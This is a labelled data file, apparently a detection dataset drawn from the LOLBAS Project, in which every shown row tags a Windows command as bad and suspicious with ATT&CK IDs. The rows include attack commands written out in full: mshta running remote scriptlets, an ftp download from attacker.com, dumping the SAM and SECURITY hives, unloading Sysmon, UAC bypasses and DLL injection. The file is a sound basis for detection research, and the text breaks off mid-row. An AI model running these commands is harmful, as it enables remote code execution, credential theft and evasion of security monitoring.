{PATH:.yml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Winget.yml,winget.exe,Execute,"[""T1105"", {""Execute"": ""Remote""}, {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ab779343caf3b9aac4757984,winget.exe install --accept-package-agreements -s msstore {name or ID},winget.exe install --accept-package-agreements -s msstore {name or ID},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Winget.yml,winget.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use ""Sysinternals Suite"" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c1a2ccb7176ef4a844539ecd,mshta.exe {PATH:.hta},mshta.exe {PATH:.hta},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mshta.yml,Mshta.exe,Execute,"[""T1218.005"", {""Execute"": ""HTA""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a14ac93d02390caaec4c8008,"mshta.exe vbscript:Close(Execute(""GetObject(""""script:{REMOTEURL:.sct}"""")""))","mshta.exe vbscript:Close(Execute(""GetObject(""""script:{REMOTEURL:.sct}"""")""))",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mshta.yml,Mshta.exe,Execute,"[""T1218.005"", {""Execute"": ""VBScript""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes VBScript supplied as a command line argument.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 594e52fbf42e2497a848c1e4,"mshta.exe javascript:a=GetObject(""script:{REMOTEURL:.sct}"").Exec();close();","mshta.exe javascript:a=GetObject(""script:{REMOTEURL:.sct}"").Exec();close();",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mshta.yml,Mshta.exe,Execute,"[""T1218.005"", {""Execute"": ""JScript""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes JavaScript supplied as a command line argument.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 398f7044e977fe74f41fb498,"mshta.exe ""{PATH_ABSOLUTE}:file.hta""","mshta.exe ""{PATH_ABSOLUTE}:file.hta""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mshta.yml,Mshta.exe,ADS,"[""T1218.005"", {""Execute"": ""HTA""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)",0.85,False,"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dbbe846567769af4a4a0e99b,mshta.exe {REMOTEURL},mshta.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mshta.yml,Mshta.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,It will download a remote payload and place it in INetCache.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b90722cb5df0140a56a64b3,PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip},PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/PrintBrm.yml,PrintBrm.exe,Download,"[""T1105"", {""Type"": ""Compression""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Create a ZIP file from a folder in a remote drive,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eaf5cf5d950516ccdf4b24db,PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder},PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/PrintBrm.yml,PrintBrm.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d53bd429ce16b681fe12ff6e,Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log},Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Microsoft.Workflow.Compiler.yml,Microsoft.Workflow.Compiler.exe,Execute,"[""T1127"", {""Execute"": ""VB.Net""}, {""Execute"": ""Csharp""}]","Windows 10S, Windows 11",0.85,False,Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ed24cf3be30584c19aa69493,Gpscript /logon,Gpscript /logon,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Gpscript.yml,Gpscript.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes logon scripts configured in Group Policy.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 82a3c973619570525d559531,Gpscript /startup,Gpscript /startup,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Gpscript.yml,Gpscript.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes startup scripts configured in Group Policy,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a0c98f518e63ff57593f3169,jsc.exe {PATH:.js},jsc.exe {PATH:.js},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Jsc.yml,Jsc.exe,Compile,"[""T1127"", {""Execute"": ""JScript""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a98787bf20c8a013e327f233,jsc.exe /t:library {PATH:.js},jsc.exe /t:library {PATH:.js},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Jsc.yml,Jsc.exe,Compile,"[""T1127"", {""Execute"": ""JScript""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3732a640068876be8532ce0c,"sc create evilservice binPath=""\""c:\\ADS\\file.txt:cmd.exe\"" /c echo works > \""c:\ADS\works.txt\"""" DisplayName= ""evilservice"" start= auto\ & sc start evilservice","sc create evilservice binPath=""\""c:\\ADS\\file.txt:cmd.exe\"" /c echo works > \""c:\ADS\works.txt\"""" DisplayName= ""evilservice"" start= auto\ & sc start evilservice",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Sc.yml,Sc.exe,ADS,"[""T1564.004"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Creates a new service and executes the file stored in the ADS.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33e1b95beba520bf6d9f9678,"sc config {ExistingServiceName} binPath=""\""c:\\ADS\\file.txt:cmd.exe\"" /c echo works > \""c:\ADS\works.txt\"""" & sc start {ExistingServiceName}","sc config {ExistingServiceName} binPath=""\""c:\\ADS\\file.txt:cmd.exe\"" /c echo works > \""c:\ADS\works.txt\"""" & sc start {ExistingServiceName}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Sc.yml,Sc.exe,ADS,"[""T1564.004"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Modifies an existing service and executes the file stored in the ADS.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3efbfe0ebcc45e1e1b9c1cf6,MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll},MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mavinject.yml,Mavinject.exe,Execute,"[""T1218.013"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Inject evil.dll into a process with PID 3110.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0e7e10eab56565096bd07e37,Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll,Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mavinject.yml,Mavinject.exe,ADS,"[""T1564.004"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 629b3468529084cc0230af75,msedge.exe {REMOTEURL:.exe.txt},msedge.exe {REMOTEURL:.exe.txt},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msedge.yml,Msedge.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,"Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c59b60684e4871caf7a218f5,"msedge.exe --headless --enable-logging --disable-gpu --dump-dom ""{REMOTEURL:.base64.html}"" > {PATH:.b64}","msedge.exe --headless --enable-logging --disable-gpu --dump-dom ""{REMOTEURL:.base64.html}"" > {PATH:.b64}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msedge.yml,Msedge.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,Edge will silently download the file. File extension should be .html and binaries should be encoded.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c49bc858fa7407c65c6432a8,"msedge.exe --disable-gpu-sandbox --gpu-launcher=""{CMD} &&""","msedge.exe --disable-gpu-sandbox --gpu-launcher=""{CMD} &&""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msedge.yml,Msedge.exe,Execute,"[""T1218.015"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d0cdd5ae0156f758e46cd2e3,echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt,echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ftp.yml,Ftp.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes the commands you put inside the text file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cbf2a030741bd2a48c12960f,"cmd.exe /c ""@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v""","cmd.exe /c ""@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ftp.yml,Ftp.exe,Download,"[""T1105""]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Download,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8c484917eaf714762e0b678b,makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab,makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Makecab.yml,Makecab.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6f4daa3c977da5ccce84fd29,makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab,makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Makecab.yml,Makecab.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 315823f7672f989560b219b1,makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab},makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Makecab.yml,Makecab.exe,Download,"[""T1105"", {""Type"": ""Compression""}]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Download and compresses the target file and stores it in the target file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33c15981bd0f910e3bc6f060,makecab /F {PATH:.ddf},makecab /F {PATH:.ddf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Makecab.yml,Makecab.exe,Execute,"[""T1036"", {""Type"": ""Compression""}]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b6f0ea6240688f3b55a6076e,wscript //e:vbscript {PATH}:script.vbs,wscript //e:vbscript {PATH}:script.vbs,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wscript.yml,Wscript.exe,ADS,"[""T1564.004"", {""Execute"": ""WSH""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute script stored in an alternate data stream,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ff5d60edab1cf7034a14e548,"echo GetObject(""script:{REMOTEURL:.js}"") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js","echo GetObject(""script:{REMOTEURL:.js}"") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wscript.yml,Wscript.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Download and execute script stored in an alternate data stream,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ed712237e5242ee121fa8fc,"forfiles /p c:\windows\system32 /m notepad.exe /c ""{CMD}""","forfiles /p c:\windows\system32 /m notepad.exe /c ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Forfiles.yml,Forfiles.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 35e27c5d8f72d629baf86809,"forfiles /p c:\windows\system32 /m notepad.exe /c ""{PATH_ABSOLUTE}:evil.exe""","forfiles /p c:\windows\system32 /m notepad.exe /c ""{PATH_ABSOLUTE}:evil.exe""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Forfiles.yml,Forfiles.exe,ADS,"[""T1564.004"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e565ea300ac30e78e3f0e6b5,runexehelper.exe {PATH_ABSOLUTE:.exe},runexehelper.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Runexehelper.yml,Runexehelper.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022",0.85,False,"Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0e82cbd86300899d26327e01,ie4uinit.exe -BaseSettings,ie4uinit.exe -BaseSettings,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ie4uinit.yml,Ie4uinit.exe,Execute,"[""T1218"", {""Execute"": ""INF""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes commands from a specially prepared ie4uinit.inf file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a8ebb4b44dd774f64e075bbc,Msconfig.exe -5,Msconfig.exe -5,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msconfig.yml,Msconfig.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6754e04165cd2d4464538f9e,fltMC.exe unload SysmonDrv,fltMC.exe unload SysmonDrv,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/FltMC.yml,fltMC.exe,Tamper,"[""T1562.001""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Unloads a driver used by security agents,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6712234311b0d099b90cc739,c:\windows\syswow64\iscsicpl.exe,c:\windows\syswow64\iscsicpl.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Iscsicpl.yml,iscsicpl.exe,UAC Bypass,"[""T1548.002"", {""Execute"": ""DLL""}]","Windows 10, Windows 11",0.85,False,"c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 057b38761c4dc0850de874b6,iscsicpl.exe,iscsicpl.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Iscsicpl.yml,iscsicpl.exe,UAC Bypass,"[""T1548.002"", {""Execute"": ""CMD""}, {""Application"": ""GUI""}]","Windows 10, Windows 11",0.85,False,"Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e86deaf1de2ebe23e84382b2,"msedgewebview2.exe --no-sandbox --browser-subprocess-path=""{PATH_ABSOLUTE:.exe}""","msedgewebview2.exe --no-sandbox --browser-subprocess-path=""{PATH_ABSOLUTE:.exe}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/msedgewebview2.yml,msedgewebview2.exe,Execute,"[""T1218.015"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a3cdbbde89ce2d80f157ae98,"msedgewebview2.exe --utility-cmd-prefix=""{CMD}""","msedgewebview2.exe --utility-cmd-prefix=""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/msedgewebview2.yml,msedgewebview2.exe,Execute,"[""T1218.015"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review abfa45da1b63043f67ab7a5a,"msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher=""{CMD}""","msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher=""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/msedgewebview2.yml,msedgewebview2.exe,Execute,"[""T1218.015"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 49528a5d6ac9aa29d728bf7f,"msedgewebview2.exe --no-sandbox --renderer-cmd-prefix=""{CMD}""","msedgewebview2.exe --no-sandbox --renderer-cmd-prefix=""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/msedgewebview2.yml,msedgewebview2.exe,Execute,"[""T1218.015"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e7a7283fda6908db775a9293,InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll},InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Installutil.yml,Installutil.exe,AWL Bypass,"[""T1218.004"", {""Execute"": ""DLL (.NET)""}, {""Execute"": ""EXE (.NET)""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute the target .NET DLL or EXE.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e91fab345cfef9a91f50b6ba,InstallUtil.exe {REMOTEURL},InstallUtil.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Installutil.yml,Installutil.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,It will download a remote payload and place it in INetCache.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e339da0f4db6a566947fcc14,query.exe user,query.exe user,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Query.yml,Query.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}, {""Requires"": ""Rename""}]","Windows 10, Windows 11",0.85,False,"Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 65de8ededa471ab484e6242d,reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg,reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Reg.yml,Reg.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Export the target Registry key and save it to the specified .REG file within an Alternate data stream.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ce7003cbb6b81fe9683d760,reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak},reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Reg.yml,Reg.exe,Credentials,"[""T1003.002""]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ead108f896b7ac91d63ffd4,verclsid.exe /S /C {CLSID},verclsid.exe /S /C {CLSID},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Verclsid.yml,Verclsid.exe,Execute,"[""T1218.012"", {""Execute"": ""COM""}]","Windows 10, Windows 11",0.85,False,Used to verify a COM object before it is instantiated by Windows Explorer,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33e45f48f63280f75ab1e65e,"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Dfsvc.yml,Dfsvc.exe,AWL Bypass,"[""T1127.002"", {""Execute"": ""ClickOnce""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 96dc01e0531320b2b36c1fd9,"wmic.exe process call create ""{PATH_ABSOLUTE}:program.exe""","wmic.exe process call create ""{PATH_ABSOLUTE}:program.exe""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wmic.yml,Wmic.exe,ADS,"[""T1564.004"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute a .EXE file stored as an Alternate Data Stream (ADS),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0f96114bdf7bd53943083839,"wmic.exe process call create ""{CMD}""","wmic.exe process call create ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wmic.yml,Wmic.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute calc from wmic,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33b3ae24fb577b6c78eb3db0,"wmic.exe /node:""192.168.0.1"" process call create ""{CMD}""","wmic.exe /node:""192.168.0.1"" process call create ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wmic.yml,Wmic.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute evil.exe on the remote system.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2c467f689df6c04af66a3435,"wmic.exe process get brief /format:""{REMOTEURL:.xsl}""","wmic.exe 